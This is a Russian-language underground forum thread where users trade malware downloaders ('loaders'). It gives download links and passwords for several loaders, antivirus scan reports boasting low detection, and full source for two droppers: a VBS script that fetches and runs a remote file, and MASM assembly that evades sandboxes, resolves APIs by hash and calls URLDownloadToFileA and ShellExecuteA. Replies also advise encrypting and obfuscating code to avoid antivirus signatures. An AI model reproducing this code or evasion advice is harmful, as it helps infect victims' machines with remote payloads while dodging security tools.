Посоветуйте лоадер.

[cuker]

anty
тестил vertex, его работу палят не все фаеры, но если он запустился до запуска фаера то нормпльно бнз палевно раюотает. Но нужно пастаянно криптовать и тд что не есть удобно

 

[accelerator]

тестил vertex, его работу палят не все фаеры, но если он запустился до запуска фаера то нормпльно бнз палевно раюотает. Но нужно пастаянно криптовать и тд что не есть удобно

любой постоянно криптовать надо

 

[DASM32]

Спойлер: 100

Семпл и инсталл-пакет админки PID loader'a (Lite-версия), получены 26.04.11.
Не знаю куда засунуть, запихнул в этот топ.

zalil.ru/30960859
Пасс: NSQ21qtBrWPagDU8dLnF

 

[pahom]

хайд большой)

 

[DarckSol]

Скрытый текст требует сообщений 100 у вас 351

хайд большой)

Сообщений: 1
Регистрация: Вчера, 15:46

Ну да, есть малость

 

[DarckSol]

Смерть барыгам https://xss.pro/index.php?topic=21584
И так:
Annloader
Annloader является профессиональным лоадером и наделен соответствующими функциями:
[*]Поддержка заданий: столько то загрузок на такие то страны и т.д.
[*]Очередность заданий
[*]Возможность всячески редактировать и переставлять задания местами.
[*]Малый размер билда, всего 30 kb
[*]Программа написана на чистом API
[*]Возможность регулирования нагрузок на ботов и выделение в белую зону
[*]Защита от взлома, которая не по зубам даже серьезным реверсерам, не говоря уже про скрипткиддисов и прочую школоту.
[*]AnnLoad получил совершенно новую панель управления не имеющую ничего общего с оптимой (разве что стабильность, дизайн и быстродействие)
[*]Панель управления НЕ ХРАНИТ Ваш пароль даже в конфиге, только hesh!
[*]На момент написания этих строк AnnLoad не детектируется ни одним АВ
[*]Алгоритм AnnLoad не содержит ничего, что могло бы мешать крипту (service mode, tls, etc...)

RESULTS:  15/34
AVG Free - Trojan horse Generic21.BJUQ
ArcaVir - Скачатьer.Agent.Gltl
Avast 5 - Win32:Malware-gen
Avast - Win32:Malware-gen
AntiVir (Avira) - TR/Dldr.Delphi.Gen
BitDefender -
VirusBuster  - Trojan.DL.Agent!HPGy6MtNHmI
Clam  -
COMODO  -
Dr.Web -
eTrust-Vet -
F-PROT  -
F-Secure  - Genrojan.Heur.DP.bGW@a46cZln
G Data - Genrojan.Heur.DP.bGW@a46cZln (Engine-A), Win32:Malware-gen (Engine-B)
IKARUS  -
Kaspersky  - Trojan-Скачатьer.Win32.Agent.gltl
McAfee -
MS  Essentials -
ESET NOD32 - Trojan.Win32/TrojanСкачатьer.Delf.QKZ
Norman - W32/Malware
Norton  -
Panda  - Malware
A-Squared -
Quick Heal  -
Rising  -
Solo  -
Sophos -
Trend Micro  -
VBA32  -
Vexira  - Trojan.DL.Agent!HPGy6MtNHmI
Webroot  -
Zoner AntiVirus - INFECTED [Trojan.Delf.NSN]
AhnLab V3  -
BullGuard - virus: Gen:Variant.Скачатьer.17

File Имя    bin.exe.exe
File Size:  30208
File MD5:    7654192c88b06be539c7e2413f519dbc
File SHA1:  09b55cc86ce7b826d0f092fbc42f28211071617a
Check Time:  2011-06-27 16:14:46

Scan report generated by
Scan4You report

Скачать|Download

passwd:0x68747470733A2F2F64616D6167656C616

ЗЫ: На работоспособность, и на клей не проверял, всё исключительно на свой страх и риск!

 

[psaria]

Annloader
кто-либо может перезалить либо посоветовать актуальный на сегодня*желательно с веб мордой?
Заранее спасибо!

 

[DarckSol]

актуальный на сегодня

Это только коммерческие проекты, в общем доступе не выкладывают полноценные проекты с актуальными обходами FW. А для "поиграться" вот:

RESULTS: 16/37
AVG Free May be infected by unknown virus Win32/DH.00000000{00000201-00000021-00000000}
ArcaVir OK
Avast 5 Win32:Malware-gen
Avast OK
AntiVir (Avira) TR/Agent.5120.148
BitDefender OK
VirusBuster Internet Security Trojan.Agent!K5bjKae37Uk
Clam Antivirus OK
COMODO Internet Security OK
Dr.Web OK
eTrust-Vet OK
F-PROT Antivirus W32/Скачатьer-Tir!Eldorado (generic, not disinfectable)
F-Secure Internet Security DeepScan:Generic.Malware.dld!!.0433FFE5
G Data DeepScan:Generic.Malware.dld!!.0433FFE5 (Engine-A), Win32:Malware-gen (Engine-B)
IKARUS Security Win32.SuspectCrc
Kaspersky Antivirus OK
McAfee OK
MS Security Essentials OK
ESET NOD32 OK
Norman W32/Suspicious_Gen2.GSNAB
Norton Antivirus OK
Panda Security OK
A-Squared Win32.SuspectCrc!IK
Quick Heal Antivirus OK
Rising Antivirus OK
Solo Antivirus OK
Sophos OK
Trend Micro Internet Security OK
VBA32 Antivirus is suspected of Trojan.Скачатьer.gen.h
Vexira Antivirus Trojan.Agent!K5bjKae37Uk
Webroot Internet Security OK
Zoner AntiVirus OK
Ad-Aware Trojan.Win32.Generic!BT
AhnLab V3 Internet Security OK
BullGuard virus: DeepScan:Generic.Malware.dld!!.0433FFE5
Immunet Antivirus DeepScan:Generic.Malware.dld!!.0433FFE5
VIPRE Trojan.Win32.Generic=21BT
  
File Name Stub.exe
File Size: 5120
File MD5: 6e19d73f1de3af1cd3da11637dd50297
File SHA1: c130309fe70ae1b4434bb0f90c3cb83d80a14b90
Check Time: 2012-02-10 14:10:04

После упаковки получилось: 4 096 байт, во втором случае 3 608 байт, ну и третий вариант выдал 3 072 байт;
Кодес написан на Delphi

Скачать|Download

passwd:dlab.org

OpenSource
************************************VBS************************************
**Поиграемся =))

strFileURL = "http://img62.imageshack.us/img62/7397/dibujogfh.jpg" //Что грузим
strHDLocation = "C:\Windows\file.jpg" //куда сохраяем
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary'
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & strHDLocation & Chr(34), 1, false //Запуск файла
Set shell = Nothing
Set objXMLHTTP = Nothing

сохраняем это в текстовый файл со своими настройками, меняем расширене файла на VBS и запускаем двойным кликом и вооля)

 

[demien]

по vbs скрипту не плохо было бы пройтись обфускатором или криптором, а то ссылка очень палится, да и как минимум на

Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & strHDLocation & Chr(34), 1, false //Запуск файла

аверы рычать будут в чистом виде...

 

[DarckSol]

аверы рычать будут в чистом виде...

  RESULTS: 4/37
AVG Free OK
ArcaVir OK
Avast 5 OK
Avast OK
AntiVir (Avira) HTML/ADODB.Exploit.Gen
BitDefender OK
VirusBuster Internet Security HTML.Psyme.Gen
Clam Antivirus OK
COMODO Internet Security OK
Dr.Web OK
eTrust-Vet OK
F-PROT Antivirus OK
F-Secure Internet Security OK
G Data OK
IKARUS Security OK
Kaspersky Antivirus OK
McAfee OK
MS Security Essentials TrojanСкачатьer:HTML/Adodb.gen!A
ESET NOD32 OK
Norman OK
Norton Antivirus OK
Panda Security OK
A-Squared OK
Quick Heal Antivirus OK
Rising Antivirus OK
Solo Antivirus OK
Sophos OK
Trend Micro Internet Security OK
VBA32 Antivirus OK
Vexira Antivirus HTML.Psyme.Gen
Webroot Internet Security OK
Zoner AntiVirus OK
Ad-Aware OK
AhnLab V3 Internet Security OK
BullGuard OK
Immunet Antivirus OK
VIPRE OK

Ну не то что бы рычать.....; на данный момент)

//**********
А про обфускатора и крипта скрипта, он какое то время служил как отдельно функцией, просто дропался скрипт, исполнялся и удалялся)
То есть записывать кодес как то так в ресурс:
...
...
strFileURL = md5[hesh];
или
strHDLocation = basa64[hash]....
В общем или любой другой алгоритм......
**Ну а если с ума малость посходить и попараноить, то можно сделать массив вариантов имени и путей дропа файла на локальной машине, и получать его рандомно или в зависимости от каких либо пораметорв....

 

[demien]

видать не попадал аверам ваш лоадер там одни голые сигны, и если сегодня-завтра скрипт кто-нить заюзает то трындец его недетектируемости...

со сути место сохранения файла особо не играет роли, главное чтобы голой сигнатуры не было, т.е. нужно пошифровать, хоть хоr'ом, важнее прятать свой линк тщательнее...

 

[Ar3s]

Обсуждение лоадеров и технологий давайте не здесь...
Создавайте топ и сколько влезет обсуждайте.

 

[DarckSol]

2demien: Этот раздел посвящен публикации "лоадеров" для публичной эксплуатации и проверки собственной безопасности...

2Ar3s.... принято....

ЗЫ:2all::Если код публикую, наверное актуальность его ниже требуемых норм, однако; Данный код никто не запрещает использовать в своих целях, модифицировать, и делать с ним что угодно.

 

[DarckSol]

.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib

LASTINPUTINFO struct
    cbSize DWORD ?
    dwTime DWORD ?
LASTINPUTINFO ends

.data

szLoadAPI db 055h, 08Bh, 0ECh, 083h, 0C4h, 0F4h, 052h, 089h, 055h, 0FCh, 08Bh, 04Ah, 03Ch, 003h, 0CAh, 089h, 04Dh, 0F4h, 08Bh, 049h 
          db 078h, 003h, 0CAh, 089h, 04Dh, 0F8h, 08Bh, 051h, 018h, 08Bh, 049h, 020h, 003h, 04Dh, 0FCh, 033h, 0FFh, 08Bh, 031h, 003h 
          db 075h, 0FCh, 033h, 0C0h, 051h, 0ACh, 08Bh, 0C8h, 003h, 0F8h, 0D3h, 0C7h, 085h, 0C0h, 075h, 0F5h, 059h, 03Bh, 0FBh, 074h 
          db 010h, 083h, 0C1h, 004h, 04Ah, 075h, 0E0h, 0BAh, 0C2h, 058h, 062h, 01Bh, 05Ah, 033h, 0C0h, 0C9h, 0C3h, 08Bh, 045h, 0FCh 
          db 08Bh, 04Dh, 0F8h, 08Bh, 059h, 018h, 08Bh, 049h, 024h, 003h, 0C8h, 02Bh, 0DAh, 0D1h, 0E3h, 003h, 0CBh, 00Fh, 0B7h, 019h 
          db 08Bh, 04Dh, 0F8h, 08Bh, 049h, 01Ch, 003h, 0C8h, 0C1h, 0E3h, 002h, 003h, 0CBh, 003h, 001h, 05Ah, 0C9h, 0C3h 

    szURL                   db 'http://example.com/file.exe', 0
    szFileName              db 'deadlyvermilion.exe', 0

    szURLMon                db 'lld.noMLRU', 0
    szShell32               db 'lld.23llehS', 0

    dwLoadAPI               DWORD ?

    dwLoadLibraryA          DWORD ?
    dwURLMon                DWORD ?
    dwShell32               DWORD ?
    dwURLDownloadToFileA    DWORD ?
    dwShellExecuteA         DWORD ?  

    FirstInput      LASTINPUTINFO <>
    SecondInput     LASTINPUTINFO <> 
    
.code

StrReverse proc lpString:LPSTR
mov eax,lpString                      ; put string address in EAX
mov edx,eax                           ; same in EDX
@@:                                   ; move EDX to the end of string
add edx,1
cmp byte ptr [edx],0
jne @B
sub edx,1                             ; return EDX to last not null character
@@:
mov cl,byte ptr [eax]         ; swap EAX and EDX, moving from two brinks
mov ch,byte ptr [edx]         ; in opposite directions
mov [eax],ch                  ; while EAX is less than EDX
mov [edx],cl
add eax,1
sub edx,1
cmp eax,edx
jl @B
ret
StrReverse endp

;********************************************************************************

start:

    MOV FirstInput.cbSize, SizeOf LASTINPUTINFO
    MOV SecondInput.cbSize, SizeOf LASTINPUTINFO

    Invoke GetLastInputInfo, ADDR FirstInput
    Invoke Sleep, 5000
    Invoke mouse_event, MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
    Invoke mouse_event, MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
    Invoke GetLastInputInfo, ADDR SecondInput

    MOV EAX, SecondInput.dwTime
    SUB EAX, FirstInput.dwTime
    CMP EAX, 4500
    JL ExitMain


    Invoke VirtualProtect, ADDR szLoadAPI, 118, PAGE_EXECUTE_READWRITE, 0

    Invoke StrReverse, ADDR szURLMon
    Invoke StrReverse, ADDR szShell32

    LEA EAX, szLoadAPI
    MOV dwLoadAPI, EAX

    ASSUME FS:NOTHING
    MOV EAX, FS:[30h]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX]
    MOV EAX, [EAX]
    MOV EAX, [EAX+18h]

    MOV EDX, EAX
    MOV EBX, 0A216A185h
    CALL dwLoadAPI
    MOV dwLoadLibraryA, EAX

    PUSH OFFSET szURLMon
    CALL EAX
    MOV dwURLMon, EAX

    PUSH OFFSET szShell32
    CALL dwLoadLibraryA
    MOV dwShell32, EAX

    MOV EDX, dwURLMon
    MOV EBX, 0B2040657h
    CALL dwLoadAPI
    MOV dwURLDownloadToFileA, EAX

    MOV EDX, dwShell32
    MOV EBX, 0D9A88A30h
    CALL dwLoadAPI
    MOV dwShellExecuteA, EAX

    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH OFFSET szURL
    PUSH 0
    CALL dwURLDownloadToFileA

    PUSH 0
    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH 0
    PUSH 0
    CALL dwShellExecuteA      
    
ExitMain:
    RET
end start

 

[DarckSol]

CodeDom Downloader FUD

Main

Options

1/24

arcavir Ок
avast Ок
avg Found Luhe.MalMSIL.B
avira Ок
bitdefender Ок
clamav Ок
drweb Ок
emsisoft ok
nod32 Ок
fprot Ок
gdata Ок
ikarus Ок
kaspersky Ок
mcafee Ок
microsoft Ок
norman Ok
norton Ок
panda Ок
quickheal Ок
sophos Ок
etrust Ок
trendmicro Ок
vipre Ок
vba32 Ок
virusbuster Ок

Subject: ldr_.exe
Size (bytes): 7168
Time: 15:29 14.07.2012

Скачать|Download

Скачать|Download

Пароль: dlab.org.in

 

[mazar]

Смерть барыгам https://xss.pro/index.php?topic=21584
И так:
Annloader

Может кто перезалить, да еще и без склейки пожалуйста

 

[DarckSol]

FuckYeah Downloader​

Check 1/20

Скачать|Download

Скачать|Download

Скачать|Download

Пароль: C1AD3463E4F8B535168D9AB89D33ED3

 

[DarckSol]

LethalDownloader 1.0.0 Coded By LethalNET in VB.NET

/**************************************************\

\**************************************************/
Fun
Fake Error
Change Icon
Codedom FUD
Out Put Size (6KB) ------- (У меня винда показала 7КВ, но это мелочи).

SCAN_FILE

Download_*
Download_1

Passwd:dlb.org

 

[Left4Dead]

DarckSol
эти лоадеры на VB с дропаньем EXE на диск это просто ё**ный стыд(

 

[DarckSol]

DarckSol
эти лоадеры на VB с дропаньем EXE на диск это просто ё**ный стыд(

Это топик паблик раздачи лоадырей, я ранее где то там VB скрипт выкладывал в качестве лоадыря, тоже тот еще вариант, но для ознакомления сойдёт...)))

ЗЫ: И кроме того, Left4Dead пользоваться этим "продуктом" не заставляет Вас никто)